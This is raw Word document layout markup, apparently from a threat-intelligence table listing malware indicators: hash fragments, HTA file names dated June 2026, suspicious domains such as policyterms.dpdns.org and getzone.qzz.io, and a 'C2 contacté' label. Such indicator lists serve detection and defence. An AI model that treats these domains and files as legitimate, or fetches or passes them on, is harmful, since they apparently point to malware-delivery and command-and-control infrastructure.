            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">https://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19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7706625</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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02285b947992c5f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99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7706625</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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01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7794890</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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readagreement.dpdns.org/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04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7883155</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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F.Creater_4_15_2-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0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7883155</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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d311a826afda781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08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7971420</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1722850" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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OdArj-10-06/rochester/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11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8059685</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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1994_10.06.2026.HTA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1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8059685</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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24674cae84ae49c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8147950</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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entertain/slight6533.lbm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1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8236215</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="342334" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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6aee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2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8590545</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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6b87b98ddae508a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23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8678810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1799545" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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3_13_7-1032_11.06.2026/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2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8767075</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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e4058867c4adb9f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28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8855340</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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30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8855340</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2335853" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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https://policyterms.dpdns.org/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3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8943605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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f1938cebbcdfe15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35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9031870</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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F.Creater_3_13_7-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37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9031870</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2105767" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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MouUrl-11-06/fault10576.kfx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9120135</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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c0135d63e5781bc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42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9208400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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1032_11.06.2026.HTA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4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9296665</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="342334" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6561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47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6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49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6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52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6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54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6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56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6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806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90564" cy="523874"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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523874">
                          <a:moveTo>
                            <a:pt x="3238499" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5790564" y="52387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523874"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1276349" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3237864" y="52387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275715" y="52387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47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1515119</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120264"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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4">
                          <a:moveTo>
                            <a:pt x="0" y="2120264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="2120264"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="1060449"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1060449"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2120264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  <a:moveTo>
                            <a:pt x="0" y="1059815"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="1059815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780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2575569</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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3636019</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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39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4696469</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120264"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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4">
                          <a:moveTo>
                            <a:pt x="0" y="2120264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="2120264"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="1060449"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1060449"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2120264"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3238499" y="1059814"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5790564" y="105981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4"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1276349" y="1059814"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3237864" y="105981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702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5756919</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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316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6817369</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5791200" cy="2919094"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1200" cy="29190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1200" h="2919094">
                          <a:moveTo>
                            <a:pt x="0" y="2476500"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2476500"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2919094"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2919094"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2476500"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2028189"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2028189"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2477135"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2477135"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2028189"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1226819"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1226819"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2028824"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2028824"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1226819"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1066165"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1066165"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1227455"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1227455"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1066165"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3239134" y="1059815"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="1059815"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3239134" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3239134" y="1059815"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1276984" y="1059815"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3238500" y="1059815"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3238500" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1276984" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1276984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62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90564" cy="523874"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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523874">
                          <a:moveTo>
                            <a:pt x="3238499" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5790564" y="52387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523874"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1276349" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3237864" y="52387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275715" y="523874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03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1515119</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120264"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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4">
                          <a:moveTo>
                            <a:pt x="0" y="2120264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="2120264"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="1060449"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1060449"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2120264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  <a:moveTo>
                            <a:pt x="0" y="1059815"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="1059815"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0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340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2575569</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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64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3636019</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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95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4696469</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120264"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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4">
                          <a:moveTo>
                            <a:pt x="0" y="2120264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="2120264"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="1060449"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1060449"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2120264"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3238499" y="1059814"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5790564" y="1059814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4"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1276349" y="1059814"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3237864" y="1059814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262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5756919</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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2120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2120265">
                          <a:moveTo>
                            <a:pt x="0" y="2120265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="2120265"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="1060450"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1060450"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2120265"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3238499" y="1059815"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5790564" y="1059815"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5790564" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3238499" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3238499" y="1059815"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1276349" y="1059815"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3237864" y="1059815"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3237864" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1276349" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1276349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876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6817369</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5791200" cy="2919094"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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1200" cy="29190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1200" h="2919094">
                          <a:moveTo>
                            <a:pt x="0" y="2476500"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2476500"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2919094"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2919094"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2476500"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2028189"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2028189"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2477135"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2477135"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2028189"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1226819"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1226819"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2028824"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2028824"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1226819"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1066165"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1066165"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1227455"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1227455"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1066165"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3239134" y="1059815"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="1059815"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3239134" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3239134" y="1059815"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1276984" y="1059815"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3238500" y="1059815"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3238500" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1276984" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1276984" y="10598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7984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97550" cy="6893559"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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7550" cy="6893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7550" h="6893559">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="6893559"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="6890384"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5797550" y="6890384"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="5829934"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="5829934"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="4769484"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="4769484"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3709035"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="3709035"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2648585"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="2648585"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1588135"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="1588135"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="527685"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="527685"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3174"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="57975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9008" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2176779</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>996959</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="6880860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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880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880860">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="688086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0032" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4138929</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>996959</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="6880860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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880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880860">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="688086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1056" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6691630</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>990609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="6893559"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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893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893559">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="689355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412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515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6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6176" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1178559</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="796173" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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1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7200" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5020310</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1088413</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="827142" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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71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C2 contacté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8224" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2669540</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1088413</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1013084" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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9248" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1275715</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1175408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="563668" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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6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02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1520455</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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eab1a24191c180b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129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1608720</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1799545" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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3_12_5-1704_11.06.2026/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1696985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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9bcb257285f153f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334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1785250</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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436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1785250</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2335853" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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https://policyterms.dpdns.org/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53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1873515</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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9fb54c2c3a66ad8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641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1961780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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F.Creater_3_12_5-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744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1961780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2182463" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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4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OdArj-10-06/shuffle4647.rmvb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84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2050045</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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44889008f6ee7d8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948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2138310</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1704_11.06.2026.HTA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05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2226575</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="342334" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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45d1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15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2580905</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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d8febf042cc258c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2669170</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1799545" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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2_17_9-1745_15.06.2026/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358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2757435</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1799545" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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https://getzone.qzz.io/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46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2757435</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6bf5832a67178c8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563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2845700</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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66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2933965</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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a943b3419de493d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768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2933965</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1799545" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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GpUrlGoogle-15-06/doll/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870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3022230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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F.Creater_2_17_9-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9728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3110495</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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attempting2449.icm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07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3110495</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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c2e8ed18f107505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177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3198760</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1745_15.06.2026.HTA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3287025</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="342334" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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16a2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38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3641355</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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c12aac6f38173f9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484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3729620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1799545" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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2_19_2-1825_15.06.2026/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58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3817885</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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4cb7228f50eb2b0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689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3817885</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2029072" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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https://getdata.dpdns.org/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792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3906150</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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894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3994415</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
